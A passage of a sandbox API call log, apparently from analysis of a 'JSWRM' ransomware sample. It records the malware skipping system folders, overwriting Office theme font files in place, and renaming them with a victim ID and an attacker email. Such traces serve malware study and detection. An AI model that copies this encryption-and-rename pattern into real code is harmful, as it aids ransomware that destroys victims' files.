[0101.075] lstrcmpiW (lpString1="Cambria.xml", lpString2="..") returned 1 [0101.075] lstrcmpiW (lpString1="Cambria.xml", lpString2="...") returned 1 [0101.075] lstrcmpiW (lpString1="Cambria.xml", lpString2="windows") returned -1 [0101.075] lstrcmpiW (lpString1="Cambria.xml", lpString2="recovery") returned -1 [0101.075] lstrcmpiW (lpString1="Cambria.xml", lpString2="perflogs") returned -1 [0101.075] lstrcmpiW (lpString1="Cambria.xml", lpString2="documents and settings") returned -1 [0101.076] lstrcmpiW (lpString1="Cambria.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.076] lstrcmpiW (lpString1="Cambria.xml", lpString2="system volume information") returned -1 [0101.076] lstrcmpiW (lpString1="Cambria.xml", lpString2="msocache") returned -1 [0101.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0101.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cambria.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cambria.xml", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cambria.xml", lpUsedDefaultChar=0x0) returned 11 [0101.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0101.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cambria.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cambria.xml", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cambria.xml", lpUsedDefaultChar=0x0) returned 11 [0101.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0101.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0101.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0101.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Cambria.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\cambria.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.076] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3556) returned 1 [0101.076] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xde0) returned 0x206858 [0101.077] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xde0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xde0, lpOverlapped=0x0) returned 1 [0101.078] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.078] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xde0, lpOverlapped=0x0) returned 1 [0101.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.078] CloseHandle (hObject=0x314) returned 1 [0101.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0101.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0101.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0101.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0101.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0101.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0101.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.079] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Cambria.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\cambria.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Cambria.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\cambria.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0101.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0101.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0101.080] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdc0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Candara.xml", cAlternateFileName="")) returned 1 [0101.080] lstrcmpiW (lpString1="Candara.xml", lpString2=".") returned 1 [0101.080] lstrcmpiW (lpString1="Candara.xml", lpString2="..") returned 1 [0101.080] lstrcmpiW (lpString1="Candara.xml", lpString2="...") returned 1 [0101.080] lstrcmpiW (lpString1="Candara.xml", lpString2="windows") returned -1 [0101.080] lstrcmpiW (lpString1="Candara.xml", lpString2="recovery") returned -1 [0101.080] lstrcmpiW (lpString1="Candara.xml", lpString2="perflogs") returned -1 [0101.080] lstrcmpiW (lpString1="Candara.xml", lpString2="documents and settings") returned -1 [0101.080] lstrcmpiW (lpString1="Candara.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.080] lstrcmpiW (lpString1="Candara.xml", lpString2="system volume information") returned -1 [0101.080] lstrcmpiW (lpString1="Candara.xml", lpString2="msocache") returned -1 [0101.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0101.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Candara.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Candara.xml", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Candara.xml", lpUsedDefaultChar=0x0) returned 11 [0101.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0101.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0101.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Candara.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Candara.xml", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Candara.xml", lpUsedDefaultChar=0x0) returned 11 [0101.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0101.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0101.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0101.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0101.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Candara.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\candara.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.081] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3520) returned 1 [0101.081] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdc0) returned 0x206858 [0101.081] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xdc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xdc0, lpOverlapped=0x0) returned 1 [0101.083] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.083] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xdc0, lpOverlapped=0x0) returned 1 [0101.083] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.083] CloseHandle (hObject=0x314) returned 1 [0101.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0101.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0101.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0101.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0101.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0101.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0101.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.084] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Candara.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\candara.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Candara.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\candara.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0101.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0101.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0101.085] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1151b8e4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1151b8e4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe38, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Century Gothic-Palatino Linotype.xml", cAlternateFileName="CENTUR~3.XML")) returned 1 [0101.085] lstrcmpiW (lpString1="Century Gothic-Palatino Linotype.xml", lpString2=".") returned 1 [0101.085] lstrcmpiW (lpString1="Century Gothic-Palatino Linotype.xml", lpString2="..") returned 1 [0101.085] lstrcmpiW (lpString1="Century Gothic-Palatino Linotype.xml", lpString2="...") returned 1 [0101.085] lstrcmpiW (lpString1="Century Gothic-Palatino Linotype.xml", lpString2="windows") returned -1 [0101.085] lstrcmpiW (lpString1="Century Gothic-Palatino Linotype.xml", lpString2="recovery") returned -1 [0101.085] lstrcmpiW (lpString1="Century Gothic-Palatino Linotype.xml", lpString2="perflogs") returned -1 [0101.085] lstrcmpiW (lpString1="Century Gothic-Palatino Linotype.xml", lpString2="documents and settings") returned -1 [0101.085] lstrcmpiW (lpString1="Century Gothic-Palatino Linotype.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.085] lstrcmpiW (lpString1="Century Gothic-Palatino Linotype.xml", lpString2="system volume information") returned -1 [0101.085] lstrcmpiW (lpString1="Century Gothic-Palatino Linotype.xml", lpString2="msocache") returned -1 [0101.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0101.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Gothic-Palatino Linotype.xml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0101.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Gothic-Palatino Linotype.xml", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Century Gothic-Palatino Linotype.xml", lpUsedDefaultChar=0x0) returned 36 [0101.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0101.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0101.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Gothic-Palatino Linotype.xml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0101.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Gothic-Palatino Linotype.xml", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Century Gothic-Palatino Linotype.xml", lpUsedDefaultChar=0x0) returned 36 [0101.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0101.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0101.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0101.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0101.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Gothic-Palatino Linotype.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century gothic-palatino linotype.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0101.086] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3640) returned 1 [0101.086] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe30) returned 0x206858 [0101.086] ReadFile (in: hFile=0x314, lpBuffer=0x206858, nNumberOfBytesToRead=0xe30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xe30, lpOverlapped=0x0) returned 1 [0101.088] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.088] WriteFile (in: hFile=0x314, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xe30, lpOverlapped=0x0) returned 1 [0101.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0101.088] CloseHandle (hObject=0x314) returned 1 [0101.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0101.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0101.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0101.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0101.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0101.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0101.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.089] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Gothic-Palatino Linotype.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century gothic-palatino linotype.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Century Gothic-Palatino Linotype.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\century gothic-palatino linotype.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0101.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0101.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.090] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdd7, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Century Gothic.xml", cAlternateFileName="CENTUR~2.XML")) returned 1 [0101.090] lstrcmpiW (lpString1="Century Gothic.xml", lpString2=".") returned 1 [0101.090] lstrcmpiW (lpString1="Century Gothic.xml", lpString2="..") returned 1 [0101.090] lstrcmpiW (lpString1="Century Gothic.xml", lpString2="...") returned 1 [0101.090] lstrcmpiW (lpString1="Century Gothic.xml", lpString2="windows") returned -1 [0101.090] lstrcmpiW (lpString1="Century Gothic.xml", lpString2="recovery") returned -1 [0101.090] lstrcmpiW (lpString1="Century Gothic.xml", lpString2="perflogs") returned -1 [0101.090] lstrcmpiW (lpString1="Century Gothic.xml", lpString2="documents and settings") returned -1 [0101.090] lstrcmpiW (lpString1="Century Gothic.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.090] lstrcmpiW (lpString1="Century Gothic.xml", lpString2="system volume information") returned -1 [0101.090] lstrcmpiW (lpString1="Century Gothic.xml", lpString2="msocache") returned -1 [0101.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Gothic.xml", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Century Gothic.xml", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 